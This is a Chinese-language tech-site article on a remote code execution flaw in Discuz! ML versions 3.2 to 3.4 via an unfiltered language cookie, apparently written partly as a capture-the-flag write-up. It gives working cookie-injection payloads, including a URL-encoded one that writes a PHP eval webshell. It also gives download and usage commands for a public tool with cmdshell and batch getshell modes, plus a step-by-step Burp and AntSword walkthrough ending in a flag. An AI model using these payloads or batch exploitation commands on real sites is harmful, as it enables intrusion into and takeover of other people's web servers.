| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> PHP知识库 -> Discuz漏洞 -> 正文阅读 |
|
[PHP知识库]Discuz漏洞 |
1、漏洞描述 Discuz国际版漏洞存在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。 2、产生原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。 3、影响版本: Discuz! ML V3.2 Discuz! ML V3.3 Discuz! ML V3.4 4、利用exp,进行上传一句话木马 1.cookie字段中会出现xxxx_xxxx_language字段,根本原因就是这个字段存在注入,导致的RCE 2.抓包找到cookie的language的值修改为xxxx_xxxx_language=sc’.phpinfo().’ 3.getshell 的payload: ’.file_put_contents(‘shell.php’,urldecode(’<?php eval($_POST["cmd"]);?>’)).’,url编码后的形式是 %27.file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp%2520eval%28%2524_%2550%254F%2553%2554%255b%2522cmd%2522%255d%29%253b%253f%253e%27%29%29.%27 所以我们可以考虑使用bur抓包改包,上传一句话木马,get shell 5、利用dz-ml-rce.py工具进行分析。本工具支持单url和批量检测,有判断模式(只判断有无该漏洞)、cmdshell模式(返回简单的cmd shell)和getshell模式(写入一句话木马)。 6、如何下载dz-ml-rce.py工具 在python2.7的环境中安装,安装命令如下: git clone https://github.com/theLSA/discuz-ml-rce.git 7、如何使用dz-ml-rce.py工具 使用时加上漏洞PHP页面(如forum.php,portal.php),直接写域名可能会重定向导致误报。 使用帮助:python dz-ml-rce.py -h 判断模式:python dz-ml-rce.py -u “http://www.xxx.cn/forum.php” cmdshell模式:python dz-ml-rce.py -u “http://www.xxx.cn/forum.php” --cmdshell getshell模式:python dz-ml-rce.py -u “http://www.xxx.cn/forum.php” --getshell 批量检测:python dz-ml-rce.py -f urls.txt 批量getshell:python dz-ml-rce.py -f urls.txt --getshell 8、实战分析: 当我们进入这个网址后,可以发现它的cms类型是Discuz! X3.2,这是一个比较老的版本,我们可以去乌云,0组查看相关思路文章,发现比较少 于是我们去百度中搜索这个Discuz! X3.2的漏洞可以get shell,所以这道题目考察的一定是cms的漏洞 而我们去网上查的话,有很多的漏洞,比如构建的请求报文,请求报文中含有恶意的PHP代码,任意删除文件,代码注入漏洞等多种漏洞 本网站我所利用的是构建的请求报文,请求报文中含有恶意的PHP代码这一漏洞,也就是Discuz ML RCE漏洞,后面又一篇文章专门写此漏洞 所以我们可以知道它存在cms漏洞:Discuz! X3.2 漏洞 中的 构建的请求报文(恶意的PHP代码,一句话木马)漏洞 所以这个题我们可以考虑使用bur抓包改包,上传一句话木马,get shell 我们对bur进行抓包: 抓包后我们可以发现在cookie字段中有xxxx_xxxx_language字段,所以我们对其进行改包 先看phpinfo文件,看是否存在相关漏洞(验证) 发现存在相关漏洞,所以我们直接上传一句话木马,构造的形式如下: %27.file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp%2520eval%28%2524_%2550%254F%2553%2554%255b%2522cmd%2522%255d%29%253b%253f%253e%27%29%29.%27 我们直接在网页上查看shell.php文件,看是否可以正常显示 我们使用蚁剑进行连接 连接成功: 最终我们就可以发现flag的文件,也就是此题的答案 flag就在其中,打开之后就是答案,也就是flag,flag{49c883689da71363809d64b8b48679ba} 此题完成 |
|
PHP知识库 最新文章 |
Laravel 下实现 Google 2fa 验证 |
UUCTF WP |
DASCTF10月 web |
XAMPP任意命令执行提升权限漏洞(CVE-2020- |
[GYCTF2020]Easyphp |
iwebsec靶场 代码执行关卡通关笔记 |
多个线程同步执行,多个线程依次执行,多个 |
php 没事记录下常用方法 (TP5.1) |
php之jwt |
2021-09-18 |
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2025年2日历 | -2025/2/27 1:44:48- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |